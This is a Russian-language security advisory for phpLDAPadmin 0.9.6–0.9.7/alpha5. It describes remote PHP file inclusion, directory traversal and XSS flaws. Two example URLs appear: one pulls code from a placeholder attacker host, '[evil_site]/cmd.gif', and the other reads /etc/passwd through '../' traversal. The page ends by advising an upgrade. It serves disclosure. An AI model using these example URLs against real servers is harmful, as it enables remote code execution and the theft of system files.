PHP инклюдинг в phpLDAPadmin

Дата публикации:
01.09.2005
Дата изменения:
24.03.2009
Всего просмотров:
1890
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-2792
CVE-2005-2654
CVE-2005-2793
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
phpLDAPadmin 0.x
Уязвимые версии: phpLDAPadmin 0.9.6 - 0.9.7/alpha5

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.

Уязвимость позволяет удаленному пользователю с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

http://[target]/[path]/phpldapadmin/welcome.php?
custom_welcome_page=http ://[evil_site]/cmd.gif

Удаленный пользователь может просмотреть произвольные файлы на системе с помощью символов обхода каталога. Пример:

http://[target]/[path]/phpldapadmin/welcome.php?
custom_welcome_page=../../../../../../../../etc/passwd

Удаленный пользователь может также выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

URL производителя: phpldapadmin.sourceforge.net

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure, remote code execution, cross site scripting

или введите имя

CAPTCHA